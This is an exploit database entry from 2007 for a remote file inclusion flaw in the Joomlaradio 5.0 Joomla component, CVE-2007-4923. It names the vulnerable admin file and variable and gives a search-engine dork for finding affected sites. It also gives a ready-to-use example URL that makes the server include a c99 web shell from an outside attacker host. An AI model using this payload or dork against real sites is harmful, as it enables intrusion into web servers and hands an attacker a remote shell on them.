[] NeoSense

Joomla! Component Joomlaradio 5.0 - Remote File Inclusion

Author: Morgan
type: webapps
platform: php
port: 
date_added: 2007-09-12 
date_updated: 2016-10-12 
verified: 1 
codes: OSVDB-37028;CVE-2007-4923 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comjoomlaradiov5[unzip_first]_black.zip

###########################
# Joomla Radio v5 Component RFI           #
###########################

Bug in :
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php
Variable : $mosConfig_live_site

Download : http://www.joomlaos.de/option,com_remository/Itemid,41/func,fileinfo/id,2661.html

Dork: inurl:"com_joomlaradiov5"

Example:

www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# milw0rm.com [2007-09-13]